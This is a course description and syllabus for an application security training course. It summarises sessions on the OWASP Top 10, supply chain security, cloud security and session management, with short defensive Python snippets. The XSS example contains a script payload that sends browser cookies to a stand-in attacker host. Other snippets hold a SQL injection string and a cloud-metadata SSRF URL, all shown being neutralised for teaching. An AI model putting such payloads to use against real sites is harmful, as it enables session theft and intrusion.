Derek Fisher

In an era where cyber threats are ever-evolving and increasingly sophisticated, securing applications from the ground up is more essential than ever. This robust, all-encompassing course is designed to equip software developers and security professionals with the knowledge and tools necessary to protect their applications throughout the entire software development lifecycle (SDLC).

This course begins by introducing participants to foundational security concepts such as "Defense in Depth," where we explore the anatomy of attacks, including vulnerabilities, exploits, and payloads, using real-world examples like the "PrintNightmare" vulnerability. We will examine how to implement multiple layers of security to build a comprehensive defense strategy against these threats. As participants progress, they will gain a deep understanding of essential security principles, including confidentiality, integrity, and availability (CIA), alongside key practices for managing authentication, authorization, and session management.

A significant portion of the course is dedicated to modern challenges in application security, such as API security. Participants will learn how Application Programming Interfaces (APIs) function within web applications, the risks they pose, and the strategies to secure them effectively. This includes a deep dive into industry standards and frameworks like the OWASP Top 10, which highlight the most critical security risks to web applications today. We’ll explore the nuances of implementing robust security controls and applying risk rating methodologies such as those from NIST, FAIR, OWASP, and CIS RAM.

Participants will also delve into advanced topics like software supply chain security, ensuring the integrity of software from development to deployment. The course covers the full spectrum of vulnerability management, from identification and evaluation to remediation and reporting, providing participants with the skills needed to maintain the security and integrity of IT systems continuously.

A thorough exploration of cryptographic techniques, including hashing, encryption (both symmetric and asymmetric), and the use of digital certificates and Public Key Infrastructure (PKI), will be provided to ensure that participants can protect sensitive data and secure communications effectively. We will cover JSON Web Tokens (JWTs), JSON Web Encryption (JWE), and JSON Web Signatures (JWS) to illustrate how these technologies are used to secure data transmissions in web applications.

As the course progresses, participants will explore the critical integration of security within the DevOps process, known as DevSecOps. Here, we emphasize the importance of embedding security practices early and continuously throughout the development lifecycle. We’ll examine the security of Continuous Integration and Continuous Deployment (CI/CD) pipelines, understanding how to secure these processes against unauthorized access, code tampering, and other threats. Participants will learn to implement security testing tools, including Static Application Security Testing (SAST), Dynamic Application Security Testing (DAST), Interactive Application Security Testing (IAST), Runtime Application Self-Protection (RASP), Web Application Firewalls (WAF), and more.

Moreover, the course will cover emerging areas like Application Security Posture Management (ASPM), which offers a comprehensive view of the security health of software applications by integrating various security practices and tools. This holistic approach ensures that organizations can manage vulnerabilities, configuration weaknesses, and compliance with security policies across the entire application lifecycle.

Practical demonstrations and hands-on activities will allow participants to apply what they’ve learned in real-world scenarios. From exploring attack trees and threat modeling techniques to conducting penetration tests and leveraging tools like CodeQL for secure coding, participants will gain valuable experience in identifying, mitigating, and responding to security threats.

By the end of this course, participants will have developed a deep, nuanced understanding of application security. They will be able to integrate security practices seamlessly into the SDLC, ensuring their applications are not only functional but resilient and secure against the full spectrum of cyber threats. Whether you're a seasoned security professional or a developer new to application security, this course will empower you with the knowledge and skills to build and maintain secure, reliable software in today’s digital landscape.

What's inside

Learning objectives

  • Learn how to become an application security champion.
  • Understand the OWASP Top 10 and how to defend against those vulnerabilities.
  • Use threat modeling to identify threats and mitigations when developing features.
  • Perform a threat model on an application.
  • Perform a vulnerability scan of an application.
  • Rate security vulnerabilities using standard and open processes.
  • Correct common security vulnerabilities in code.
  • Understand how application security fits into an overall cybersecurity program.
  • Build security into the software development life cycle.

Syllabus

What should you expect from this class? What we will and won't cover.
Welcome to Understanding Application Security!
Introduction to Derek and the course. You will learn some of the terms we use throughout this course as well as see a hands-on demo of WebGoat.

Here we explore the software development lifecycle (SDLC) and its integration with security practices. The session begins with an introduction to the SDLC phases, starting from the initial gathering of customer requirements, through design, development, testing, and finally, deployment into production. We emphasize the importance of translating customer needs into actionable design elements, chunking work into manageable tasks, and thoroughly testing each component.

We also highlight the critical role of security within the SDLC, from embedding security requirements during the design phase to implementing application security testing tools in the development and testing phases. Key security concepts such as threat modeling, secure architecture reviews, and vulnerability management are discussed, ensuring that security is integrated throughout the entire lifecycle.

In this section, we delve into the OWASP (Open Web Application Security Project) and its significance in software security. OWASP has evolved into a comprehensive resource for application security, offering tools, standards, and frameworks to support secure software development. We begin by exploring OWASP's key offerings, including Threat Dragon for threat modeling, ASVS for security requirements, and various tools like Dependency-Check and CycloneDX for managing vulnerabilities in third-party components.

In this session, we dive into foundational security concepts, beginning with defining security and cybersecurity. Drawing from various definitions, we explore the essence of security as the protection of assets against threats, whether intentional, like cyber attacks, or unintentional, like failures. We then break down key terms such as assets, vulnerabilities, attacks, and threats, emphasizing how these elements interact within a system.

The session also introduces the core goals of cybersecurity, often referred to as the CIA triad: Confidentiality, Integrity, and Availability. We discuss how these principles guide the protection of IT assets within an organization, ensuring data is kept secure, accurate, and accessible only to authorized users.

In this session, we explore the core goals of cybersecurity within IT and technology organizations, focusing on the three fundamental pillars: confidentiality, integrity, and availability. We begin by defining each of these goals:

  • Confidentiality: Ensuring that sensitive information is accessible only to authorized individuals.

  • Integrity: Maintaining the accuracy and unaltered state of data, safeguarding it from unauthorized modifications or corruptions.

  • Availability: Ensuring that data and services are accessible to authorized users whenever needed.

These pillars collectively form the CIA triad, which is central to all security strategies.

We then move on to discuss security mechanisms and principles that support these goals. Key principles include economy of mechanism (keeping it simple), fail-safe defaults, complete mediation, open design, separation of privileges, least privilege, least common mechanism, and psychological acceptability. These principles guide the selection and design of security mechanisms to effectively implement the CIA triad.

In this session, we delve into the National Institute of Standards and Technology (NIST) and its pivotal role in advancing cybersecurity practices. NIST, though broader in its focus, provides significant resources and frameworks for enhancing cybersecurity across various sectors.

We begin with an overview of NIST’s cybersecurity programs, which aim to promote U.S. innovation and industrial competitiveness by advancing measurement science, standards, and related technologies. These programs are crucial in addressing current and future cybersecurity challenges.

In this session, we explore the Cloud Security Alliance (CSA) and its vital role in promoting best practices for security within cloud computing. The CSA is a leading organization dedicated to providing security assurance in cloud environments by harnessing the expertise of industry practitioners, associations, governments, and corporate members.

We begin by discussing the CSA's mission to educate and secure all forms of computing through cloud-specific research and best practices. Key initiatives by CSA include the Security Trust and Assurance Registry (STAR), a comprehensive provider certification program, and the CSA Global Consulting Program, which connects cloud users with trusted security professionals.

The session then delves into the CSA Security Guidance for Critical Areas of Focus in Cloud Computing. This guidance, structured around 14 domains, offers a practical roadmap for organizations to adopt cloud securely. The domains cover essential aspects of cloud security, such as governance, infrastructure security, application security, data security, and identity management. We also discuss the Cloud Controls Matrix (CCM), a meta-framework of cloud-specific security controls that align with leading industry standards.

This quiz will cover some of the terms and goals for application security.

This module delves into the concept of defense in depth, a layered security approach designed to protect systems against vulnerabilities, exploits, and malicious payloads.

In this session, we explore the concept of "Defense in Depth" within the context of cybersecurity. The presenter walks through the anatomy of an attack, breaking down key elements such as vulnerabilities, exploits, and payloads. Using the real-world example of the "PrintNightmare" vulnerability, the session illustrates how attackers exploit weaknesses in software to deliver malicious payloads. The core of the discussion revolves around implementing multiple layers of security, known as defense in depth, to protect systems against such threats. The presenter uses a whiteboard to visually explain how various security measures, like firewalls, encryption, and intrusion detection systems, work together to safeguard a web application from multiple attack vectors. This session provides a practical and comprehensive overview of how organizations can build robust defenses to protect valuable data and systems.

In this session, we delve into key cybersecurity concepts and explore various types of threat actors. The presenter begins by defining essential terms like confidentiality, integrity, availability (CIA), authentication, authorization, and more. These foundational concepts set the stage for understanding how systems manage security and access control.

The session then shifts to an in-depth analysis of different threat actors, ranging from script kiddies and hacktivists to advanced persistent threats (APTs). The presenter discusses each group's skill level, motivation, and common attack methods, highlighting the varying levels of difficulty in defending against them. The discussion also covers important tools like the Common Vulnerabilities and Exposures (CVE) system, the Common Vulnerability Scoring System (CVSS), the Exploit Prediction Scoring System (EPSS), and the Common Weakness Enumeration (CWE). These tools help organizations identify, assess, and prioritize vulnerabilities, guiding their security efforts.

In this session, we explore the critical topic of API security, delving into what APIs are and how they function within modern web applications. The session begins by defining APIs (Application Programming Interfaces) and their role in enabling modular functionality within applications. The presenter contrasts the traditional HTTP request-response model with the more specific and often lightweight calls made through APIs, which frequently return data in formats like JSON or XML.

The discussion then shifts to API security, emphasizing the importance of safeguarding APIs against various vulnerabilities. The presenter introduces the OWASP API Security Top 10, a set of guidelines designed to address common security issues in APIs. Each of the top 10 vulnerabilities, such as Broken Object Level Authorization, Broken Authentication, and Security Misconfiguration, is explained in detail, along with prevention strategies to mitigate these risks.
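To make the first of those risks concrete, here is a minimal sketch (not taken from the course materials) of an object-level authorization check in Python. Flask, the toy datastore, and the `fake_auth` stub are assumptions made purely for illustration:

```python
# A hypothetical sketch of an object-level authorization check (OWASP API
# Security Top 10: Broken Object Level Authorization). Flask, the toy
# datastore, and the fake_auth stub are assumptions for illustration.
from flask import Flask, abort, g

app = Flask(__name__)

# Toy datastore: order ID -> owning user ID.
ORDERS = {
    101: {"owner_id": 1, "total": 49.99},
    102: {"owner_id": 2, "total": 19.99},
}

@app.before_request
def fake_auth():
    # Stand-in for real authentication (e.g., validating a session or JWT).
    g.current_user_id = 1

@app.route("/api/orders/<int:order_id>")
def get_order(order_id):
    order = ORDERS.get(order_id)
    if order is None:
        abort(404)
    # The critical check: verify the caller owns the object instead of
    # trusting the identifier supplied in the URL.
    if order["owner_id"] != g.current_user_id:
        abort(403)
    return order
```

The key point is that the server verifies ownership of the requested object itself rather than trusting whatever identifier the client supplied.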

In this session, we explore Content Security Policy (CSP), a crucial security feature designed to protect web applications from common attacks like cross-site scripting (XSS) and data injection. The session begins by explaining what CSP is and how it functions as an additional layer of defense for web applications. By controlling the sources from which content can be loaded on a web page, CSP ensures that only trusted content is executed by the browser, thereby mitigating risks such as XSS, clickjacking, and packet sniffing.

The session also delves into how to implement CSP, detailing the use of policy directives that define rules for different resource types like scripts, styles, images, and connections. The presenter provides examples of how to write a CSP policy using HTTP headers or meta tags, including a sample policy that restricts content to trusted sources.
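As a rough illustration of the header-based approach (Flask is assumed here, and the policy values are examples rather than the course's sample policy), a restrictive CSP can be attached to every response:

```python
from flask import Flask

app = Flask(__name__)

# An illustrative policy: only allow resources from our own origin, plus
# scripts from one trusted CDN. The sources are placeholders to adapt.
CSP_POLICY = (
    "default-src 'self'; "
    "script-src 'self' https://cdn.example.com; "
    "img-src 'self'; "
    "frame-ancestors 'none'"  # also mitigates clickjacking
)

@app.after_request
def set_csp(response):
    response.headers["Content-Security-Policy"] = CSP_POLICY
    return response
```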

In this session, we explore Server-Side Request Forgery (SSRF), a significant web security vulnerability that can lead to unauthorized access to internal systems and data leakage. SSRF allows attackers to manipulate a server-side application into making HTTP requests to arbitrary domains chosen by the attacker. The session begins with an explanation of how SSRF works, emphasizing the potential security risks it poses.

To help viewers understand how to defend against SSRF attacks, the session covers strategies at both the network and application layers. At the network layer, defenses include segmenting remote resource access functionality and enforcing a "deny by default" firewall policy to block unnecessary internet traffic. At the application layer, the focus is on sanitizing and validating client-supplied input using an allow list approach, disabling HTTP redirections, and avoiding user-supplied URLs as input.
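A minimal sketch of the allow-list approach in Python follows; the hostnames are placeholders, and a production validator would need to handle more edge cases (DNS rebinding, encoded hosts, and so on):

```python
from urllib.parse import urlparse

# Hostnames the application is permitted to fetch from (the allow list).
ALLOWED_HOSTS = {"api.partner.example", "images.example.com"}

def is_safe_url(url: str) -> bool:
    """Validate a client-supplied URL before the server fetches it."""
    parsed = urlparse(url)
    if parsed.scheme not in ("http", "https"):
        return False
    # Exact hostname match against the allow list; reject anything else,
    # including IP literals that could point at internal services.
    return parsed.hostname in ALLOWED_HOSTS

assert is_safe_url("https://api.partner.example/v1/data")
assert not is_safe_url("http://169.254.169.254/latest/meta-data/")  # cloud metadata endpoint
```

When the server later performs the fetch, redirects should also be disabled (for example, `requests.get(url, allow_redirects=False)`), since a redirect can otherwise bounce an allowed host to an internal one.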

In this session, we explore the critical components and processes involved in Vulnerability Management and how they contribute to maintaining the security and integrity of IT systems. Effective vulnerability management is an ongoing process that involves identifying, evaluating, and addressing security vulnerabilities in an organization's infrastructure.

Common Vulnerability Scoring System (CVSS)

We begin by discussing the Common Vulnerability Scoring System (CVSS), an open framework used to communicate the characteristics and severity of software vulnerabilities. CVSS is a cornerstone of vulnerability management, providing a standardized method for assessing and comparing the impact of vulnerabilities across different systems and applications.

CVSS includes four metric groups:

  1. Base Metrics: Reflect the intrinsic qualities of a vulnerability that remain constant over time.

  2. Threat Metrics: Describe the characteristics of the vulnerability that can change over time.

  3. Environmental Metrics: Focus on unique aspects of the vulnerability specific to the user’s environment.

  4. Supplemental Metrics: Provide additional insights into the characteristics of the vulnerability.

The Base Score is particularly important, as it rates the severity of a vulnerability on a scale from 0 to 10, helping organizations prioritize their responses to vulnerabilities. The score considers factors like the attack vector, complexity, required privileges, user interaction, and the impact on confidentiality, integrity, and availability.
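The qualitative severity bands defined by the CVSS specification (Low 0.1–3.9, Medium 4.0–6.9, High 7.0–8.9, Critical 9.0–10.0) are easy to capture in a small helper; this function is illustrative rather than part of the course:

```python
def cvss_severity(score: float) -> str:
    """Map a CVSS base score (0.0-10.0) to its qualitative severity rating."""
    if not 0.0 <= score <= 10.0:
        raise ValueError("CVSS scores range from 0.0 to 10.0")
    if score == 0.0:
        return "None"
    if score <= 3.9:
        return "Low"
    if score <= 6.9:
        return "Medium"
    if score <= 8.9:
        return "High"
    return "Critical"

print(cvss_severity(9.8))  # "Critical" -- e.g., a remotely exploitable flaw
```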

Section Quiz

More in-depth review of the Top 10 Web Application vulnerabilities.

In this session, we delve into the critical topic of broken access control, a common vulnerability that occurs when security policies meant to restrict user actions fail. Access control is designed to ensure that users cannot act outside their intended permissions, but when it breaks down, it can lead to unauthorized access, modification, or destruction of data, and misuse of business functions. This session highlights the various ways in which access control can be compromised, such as through URL manipulation, inadequate authorization checks, or improper handling of access tokens.

We explore common vulnerabilities, including violations of the principle of least privilege, bypassing access control checks, and unauthorized API access. Additionally, we discuss techniques to prevent these issues, such as enforcing "deny by default" policies, implementing robust access control mechanisms, and ensuring proper authorization checks are consistently applied throughout an application.
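As a rough sketch of "deny by default" at the code level (the decorator and data shapes are assumptions for illustration), access is refused unless a role is explicitly allowed:

```python
from functools import wraps

def require_role(*allowed_roles):
    """Decorator enforcing deny-by-default: no matching role, no access."""
    def decorator(func):
        @wraps(func)
        def wrapper(user, *args, **kwargs):
            if user.get("role") not in allowed_roles:
                raise PermissionError("access denied")  # deny by default
            return func(user, *args, **kwargs)
        return wrapper
    return decorator

@require_role("admin")
def delete_account(user, account_id):
    print(f"{user['name']} deleted account {account_id}")

delete_account({"name": "alice", "role": "admin"}, 42)    # allowed
# delete_account({"name": "bob", "role": "viewer"}, 42)   # raises PermissionError
```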

Broken Access Control - Demo

In this session, we delve into the critical topic of cryptographic failures, exploring how improper handling of cryptographic processes can expose sensitive data to unauthorized access. We begin by identifying key types of sensitive data that organizations must protect, such as Personally Identifiable Information (PII), Protected Health Information (PHI), and financial data, including PCI (Payment Card Industry) data.

We discuss essential strategies for safeguarding data at rest, in motion, and in use. This includes data encryption, access controls, secure data deletion, transport layer encryption, digital certificates, memory management, and more. We also emphasize the importance of discovering, classifying, tagging, and mapping data within a system to ensure comprehensive protection.

A key focus is on encryption techniques, including the use of HTTPS for web applications and various encryption methods for databases. We also introduce Hardware Security Modules (HSMs) as a secure means of storing cryptographic keys.

In this session, we explore the concept of injection attacks, focusing primarily on SQL injection, one of the most prevalent and dangerous web security vulnerabilities. The session begins with a detailed explanation of what injection is, describing how user input can be manipulated to change the intended behavior of a system, leading to unauthorized actions such as data retrieval, modification, or deletion.

The session walks through various types of injection attacks, including SQL injection, NoSQL injection, OS injection, and LDAP injection, providing specific examples and prevention techniques for each. Emphasis is placed on the importance of input validation, sanitization, and the use of parameterized queries to prevent these types of attacks.
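The parameterized-query defense is easy to show in miniature. This self-contained Python example (sqlite3 chosen for convenience; the course's own demos use WebGoat) contrasts unsafe string building with a bound parameter:

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (id INTEGER, name TEXT)")
conn.execute("INSERT INTO users VALUES (1, 'alice')")

user_input = "alice' OR '1'='1"  # classic injection attempt

# UNSAFE: string concatenation lets the input rewrite the query:
#   f"SELECT * FROM users WHERE name = '{user_input}'"

# SAFE: a parameterized query treats the input strictly as data.
rows = conn.execute(
    "SELECT * FROM users WHERE name = ?", (user_input,)
).fetchall()
print(rows)  # [] -- the injection payload matches no user
```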

Injection Demo

In this session, we explore the concept of insecure design, a critical category introduced by OWASP in 2021, which emphasizes the importance of addressing security during the design phase of software development. We define insecure design as the lack of proper security controls or considerations in the application's architecture, potentially leading to exploitable vulnerabilities.

We discuss how to avoid insecure design by integrating threat modeling early in the design phase, applying secure design principles and patterns, and conducting regular security reviews. Additionally, we highlight the importance of creating secure user stories, implementing threat modeling to identify risks, and incorporating various application security testing methods throughout the Software Development Life Cycle (SDLC).

The session also covers common attacks related to insecure design, including missing access controls, broken authentication, security misconfiguration, and inadequate data protection. We provide real-world examples, such as the 2023 DarkBeam breach, to illustrate the consequences of insecure design and misconfiguration.

In this session, we explore the concept of security misconfiguration, a common and often overlooked vulnerability that can expose systems and applications to severe risks. Security misconfiguration occurs when security settings are improperly defined, implemented, or maintained, leaving various layers of a system—such as operating systems, web servers, database servers, and application code—vulnerable to attacks.

We discuss the potential consequences of security misconfiguration, including data breaches, loss of sensitive information, and significant reputational damage. The session highlights how attackers can exploit misconfigurations by targeting unsecured servers, default accounts with unchanged passwords, exposed error messages, and outdated software.

In this session, we dive into the risks and challenges associated with using known vulnerable components within software development. We explore the concept of dependencies—both direct and indirect—that your application may rely on, and how vulnerabilities in these components can introduce significant security risks.

We discuss the importance of thoroughly vetting third-party libraries, implementing strong dependency management processes, and regularly monitoring for vulnerabilities. This session also emphasizes the need for robust security practices, such as signing software, utilizing reputable repositories, and staying informed through security bulletins.

In this session, we explore the critical topic of identification and authentication failures, emphasizing the importance of securing the process of verifying user identities. Authentication, often shortened to "authN," is the foundation of secure access to IT systems, ensuring that only authorized users can perform actions and access sensitive information. We delve into various vulnerabilities that can weaken authentication mechanisms, including the lack of HTTPS, absence of multi-factor authentication (MFA), weak password recovery processes, and the dangers of automated attacks such as brute forcing and credential stuffing.

We also discuss common attacks that target authentication systems, such as exploiting default credentials, ineffective password storage, and session management flaws. The session provides practical defenses against these threats, including enforcing strong password practices, implementing MFA, limiting failed login attempts, and securing session management.

Identification Failures Demo

In this session, we explore software and data integrity failures, focusing on the critical stages from code development to production deployment. We begin by mapping out the typical software delivery pipeline—code is written by developers, checked into a source code manager, built, tested, and finally deployed in production. Along this journey, various points are vulnerable to integrity failures that could compromise the security and reliability of the software.

Key issues include the use of unsigned or malicious software packages, the risks of pulling code from untrusted repositories, and the dangers of installing patches that might carry vulnerabilities. We also address the importance of verifying the integrity of data that flows between applications and systems, emphasizing the need for robust integrity checks.

In this session, we delve into the critical topic of security logging and monitoring failures, a key factor in many significant cybersecurity incidents. We discuss how inadequate logging and monitoring can allow attackers to operate undetected, increasing the likelihood of successful breaches and the complexity and cost of remediation. Historical data highlights the importance of reducing the time between a breach and its detection, with recent statistics showing a reduction in detection time from 191 days in 2016 to 21 days in 2021.

We explore real-world scenarios where logging and monitoring failures can occur, such as during penetration testing, high-value transactions, or repeated failed authentication attempts, and how these should trigger alerts. The session emphasizes the importance of utilizing a Security Information and Event Management (SIEM) system to aggregate logs from various systems and ensure that all significant events are captured and analyzed.
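As a small illustration (not from the course), events like repeated failed logins can be emitted as structured JSON that a SIEM can parse and alert on; the field names here are assumptions:

```python
import json
import logging
import sys

# Minimal structured security-event logging suitable for SIEM ingestion.
logger = logging.getLogger("security")
logger.setLevel(logging.INFO)
logger.addHandler(logging.StreamHandler(sys.stdout))

def log_failed_login(username: str, source_ip: str, attempt: int):
    event = {
        "event": "auth.login_failed",
        "username": username,
        "source_ip": source_ip,
        "attempt": attempt,
    }
    # Repeated failures from one source should trigger an alert downstream.
    logger.warning(json.dumps(event))

log_failed_login("alice", "203.0.113.7", attempt=3)
```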

In this session, we delve into the concept of cross-site scripting (XSS), a prevalent web security vulnerability that allows attackers to inject malicious scripts into web applications. These scripts are then executed in the browsers of unsuspecting users. We start by explaining what XSS is, breaking it down into two primary types: reflected and stored (or persistent) XSS. Reflected XSS involves the immediate reflection of malicious scripts off a web server, while stored XSS is more severe, with the script being stored permanently on the server.

The session explores the various impacts of XSS, including stealing sensitive data like cookies and session tokens, defacing websites, and redirecting users to malicious sites. We also cover how XSS can bypass security measures like the same-origin policy, which typically restricts scripts from accessing data on other pages.
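Contextual output encoding is the core defense, and Python's standard library makes the idea easy to demonstrate (an illustrative sketch, not the course's demo):

```python
import html

user_comment = '<script>document.location="https://evil.example/?c="+document.cookie</script>'

# Contextual output encoding: the payload is rendered as inert text
# instead of being executed by the browser.
safe = html.escape(user_comment)
print(safe)
# &lt;script&gt;document.location=&quot;https://evil.example/?c=&quot;+document.cookie&lt;/script&gt;
```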

XSS Demo

This quiz will test your knowledge on the OWASP Top Ten.

Analyze the key components of a software supply chain, identify potential vulnerabilities, and apply best practices to enhance the security of your project's software dependencies.

In this session, we dive into the critical topic of software supply chain security, exploring the practices and measures necessary to ensure the integrity and security of software throughout its entire lifecycle. We start by defining the software supply chain, which includes various stages such as design, development, testing, integration, packaging, and delivery to end users. Each of these stages presents potential security risks, and attackers may attempt to exploit vulnerabilities at any point to compromise the software.

In this session, we focus on mitigating supply chain security issues by exploring various strategies and controls designed to ensure the integrity and security of software throughout its lifecycle. We begin by discussing the concept of software integrity, which SafeCode defines as the confidence that software, hardware, and services are free from both intentional and unintentional vulnerabilities and that they function as intended. We highlight key principles essential to maintaining software integrity, such as chain of custody, least privileged access, separation of duties, tamper resistance and evidence, persistent protection, compliance management, and thorough code testing and verification.

In this session, we delve into Software Composition Analysis (SCA), a critical process for validating that the components, libraries, and open-source software used in an application are free from known vulnerabilities and comply with license requirements. As modern software development often involves integrating a significant amount of third-party code, SCA plays a vital role in identifying and managing risks associated with these external components.

We begin by explaining the purpose of SCA, which is to identify open-source vulnerabilities or license issues within software integrated into an application. The vast majority of code in a final product often comes from external sources, such as open-source libraries, commercial applications, or third-party services. As developers incorporate these external components into their projects, it's crucial to ensure that they are secure and up-to-date.

In this session, we explore the Supply Chain Levels for Software Artifacts (SLSA or "Salsa"), a framework designed to enhance the security and trustworthiness of software supply chains. SLSA provides a set of best practices and guidelines to evaluate, improve, and verify the integrity of software artifacts throughout the supply chain, with the goal of increasing transparency, reducing risk, and protecting against potential tampering or compromise of software components.

We start by discussing the importance of ensuring the integrity of source code, the build process, and the packaging process. Key points include the necessity of authorizing and authenticating individuals who contribute to the source code, preventing unintentional changes, and ensuring that the source code repository used for builds is legitimate and secure. Additionally, the session emphasizes the need for robust security controls within the build pipeline and the importance of verifying that third-party dependencies are not vulnerable.

In this session, we delve into the concept of Software Bill of Materials (SBOMs), a crucial tool for enhancing transparency and security within the software supply chain. SBOMs provide a formal, machine-readable inventory of software components and dependencies, along with their hierarchical relationships. These inventories play a vital role in ensuring that all software components used in a project are accounted for and evaluated for security and compliance risks.

We begin by exploring the different types of SBOMs as defined by the Cybersecurity and Infrastructure Security Agency (CISA):


  1. Design SBOMs: Intended for planned software projects, capturing the intended components and architecture.

  2. Source SBOMs: Created directly from the development environment, capturing source files and dependencies used to build the software artifact.

  3. Build SBOMs: Generated as part of the build process, including data from source files, dependencies, build components, and ephemeral data.

  4. Analyzed SBOMs: Created through the analysis of artifacts post-build, providing insights into the software as it exists in its final form.

  5. Deployed SBOMs: Document the software as it is deployed on a system, capturing an inventory that includes software from various SBOMs and dynamically loaded components.

  6. Runtime SBOMs: Generated by instrumenting the system running the software, focusing on components present during execution and external interactions.

In this lecture, we delve into the intersection of CycloneDX and Dependency-Track, two essential tools for managing software dependencies and enhancing security in the development process.
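For orientation, here is what a minimal CycloneDX-style SBOM looks like, built by hand in Python purely for illustration; real SBOMs are produced by build tooling such as the CycloneDX generators mentioned earlier:

```python
import json

# A minimal CycloneDX-style SBOM. Field names follow the CycloneDX JSON
# format; the component listed is an arbitrary example.
sbom = {
    "bomFormat": "CycloneDX",
    "specVersion": "1.5",
    "version": 1,
    "components": [
        {
            "type": "library",
            "name": "requests",
            "version": "2.31.0",
            "purl": "pkg:pypi/requests@2.31.0",
        }
    ],
}
print(json.dumps(sbom, indent=2))
```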

Check your knowledge of supply chain security.

Understand what containers are and how they are used in application and cloud architectures, as well as the security concerns related to cloud environments.

In this section, we provide an overview of cloud computing, focusing on its key characteristics like scalability and cost efficiency. We delve into the shared responsibility model, highlighting the security responsibilities of both cloud service providers and customers. Additionally, we discuss the benefits of cloud technology, including enhanced security and flexibility. This content is part of our Cloud, AWS, and Container Security series.

In this section on cloud security, we explore the unique security challenges associated with cloud computing. We discuss common security risks, such as data breaches and misconfigurations, and how these can be exacerbated in a cloud environment. The shared responsibility model is highlighted as a key concept, emphasizing the division of security responsibilities between cloud service providers and customers. We also touch on compliance and regulatory issues, the impact of multi-tenancy, and the potential for virtualization vulnerabilities. Data residency and sovereignty concerns are addressed, as well as the importance of cloud service provider reliability.

This section introduces the AWS security pillar within the well-architected framework, emphasizing the shared responsibility model between AWS and its customers. Key design principles for cloud security are highlighted, including strong identity foundations, traceability, defense in depth, automation of security practices, data protection, minimizing human access to data, and preparation for security events.

In this section, the focus is on Amazon Web Services Identity and Access Management (IAM), a fundamental aspect of managing access to AWS resources. The key IAM concepts explored here include AWS accounts, users, groups, roles, and policies.

In this section, the focus is on detection within AWS, encompassing various stages of the application delivery lifecycle, including development, deployment, and operations. The CI/CD (Continuous Integration/Continuous Deployment) pipeline is highlighted as the process through which software is continuously integrated, packaged, and deployed to various environments.

In this section, the focus is on infrastructure protection within AWS. This entails safeguarding the various components of an AWS environment, including network boundaries, system configurations, and compute resources.

In this section, the focus is on data protection within AWS, encompassing the safeguarding of data at rest and in transit. The fundamental principles of data protection in AWS revolve around data classification and encryption.


In this section, the focus is on incident response within AWS. While application security professionals may not typically be directly involved in incident response, it's essential to be aware of the AWS services and mechanisms that play a crucial role in responding to security incidents effectively.

Application security is a critical aspect of AWS, and by following these practices and utilizing AWS-specific tools and services, organizations can enhance the security of their applications within the AWS environment.

Container security is crucial in modern application deployment scenarios. Here are some tools and practices to help organizations secure their containerized workloads effectively.

While AWS has the largest market share of cloud deployments, both GCP and Azure take their own unique approaches to cloud and cloud security.

This quiz will test your knowledge of cloud and container security.

In this section we will discuss various session management techniques to help with authentication and authorization.

In this section, we explored the concept of session management in web applications, emphasizing the importance of maintaining session integrity and security. Session management allows web applications to track user interactions through unique session IDs or tokens, often managed via cookies. These session IDs link user authentication credentials to HTTP traffic, enabling consistent access control. Best practices include marking session cookies as secure and HTTP-only, avoiding the use of Max-Age and Expires values to prevent persistent cookies, and implementing security measures like generating random, unguessable session IDs and automatically expiring sessions after inactivity. Additionally, we touched on federated identity, which allows single sign-on across multiple IT systems, enhancing both security and user experience.
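A minimal sketch of those cookie best practices in Python (Flask is assumed here; the course material itself is framework-agnostic):

```python
from flask import Flask

app = Flask(__name__)
app.secret_key = "replace-with-a-long-random-value"

# Harden the session cookie along the lines described above.
app.config.update(
    SESSION_COOKIE_SECURE=True,     # only sent over HTTPS
    SESSION_COOKIE_HTTPONLY=True,   # not readable from JavaScript
    SESSION_COOKIE_SAMESITE="Lax",  # limits cross-site sending
)
# Leaving Max-Age/Expires unset keeps the cookie non-persistent,
# so it is discarded when the browser closes.
```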

In this section, we discussed web server session management, focusing on how different platforms like Java and .NET handle sessions. Java provides session management through the HTTP session interface, allowing sessions to be created or retrieved via methods like getSession. For .NET, session state can be stored in various modes, such as InProc, StateServer, SQLServer, or Custom. Each mode offers different levels of persistence and scalability, depending on the application’s needs. For instance, InProc stores session data in memory on the web server, while SQLServer mode stores it in a database, offering better persistence across application restarts and compatibility with web farms. However, storing session data, especially in URLs, can raise security concerns, emphasizing the need for secure session management practices.

In this section, we discussed JSON Web Tokens (JWTs), a compact and self-contained method for securely transmitting information between parties as a JSON object. JWTs can be signed using either a secret with HMAC algorithms or a public/private key pair with RSA or ECDSA, ensuring the integrity and authenticity of the transmitted data. Common use cases for JWTs include authorization, where a JWT allows access to specific resources, and authentication, where a JWT is used instead of traditional server-side sessions. The structure of a JWT consists of three parts: a header (which includes the token type and hashing algorithm), a payload (which contains claims or statements about the user), and a signature (which ensures the token hasn’t been tampered with). This design allows JWTs to be stateless, meaning that the server does not need to store user sessions, thereby improving efficiency and security.
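The sign-and-verify round trip can be sketched in a few lines of Python; the PyJWT library is an assumption made for this illustration:

```python
import jwt  # PyJWT (pip install PyJWT) -- one common JWT library

SECRET = "change-me"

# Create a signed token: header and payload are base64url-encoded, then
# signed with HMAC-SHA256 so any tampering is detectable.
token = jwt.encode({"sub": "user-42", "role": "reader"}, SECRET, algorithm="HS256")

# Verification recomputes the signature and rejects modified tokens.
claims = jwt.decode(token, SECRET, algorithms=["HS256"])
print(claims)  # {'sub': 'user-42', 'role': 'reader'}
```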

Example of a JSON Web Token in action.

JWE (JSON Web Encryption)

In this section, we discussed OAuth, an open standard for access delegation that allows users to grant third-party websites or applications access to their information on other platforms without sharing their passwords. OAuth is widely used by companies like Amazon, Google, and Facebook to enable secure data sharing. It separates authentication from authorization, supporting various use cases, including server-to-server, browser-based, mobile, and console applications. OAuth enables apps to obtain limited access, known as scopes, to a user’s data through access tokens issued by an authorization server, with the user’s consent. The process typically involves a user granting permissions, often customizable, which are then used by the third-party application to access protected resources. This framework is essential for securely managing API access and protecting user data across different platforms.

In this section, we discussed OpenID, an open standard and decentralized authentication protocol that allows users to authenticate with multiple websites using a single identity, managed by a third-party identity provider. Promoted by the nonprofit OpenID Foundation, this protocol eliminates the need for users to create separate logins and passwords for each site, enhancing convenience and security. The OpenID protocol facilitates communication between the identity provider and the relying party (the website), allowing users to sign in without exposing their password to any site other than the identity provider.

OpenID Connect, a layer built on top of OAuth 2.0, extends this functionality by enabling clients, such as web-based or mobile applications, to verify a user's identity and obtain basic profile information securely. This integration supports a broad range of client types and includes optional features like encryption and session management, making it a versatile tool for modern web authentication and identity verification.

This quiz will test your knowledge of session management practices.

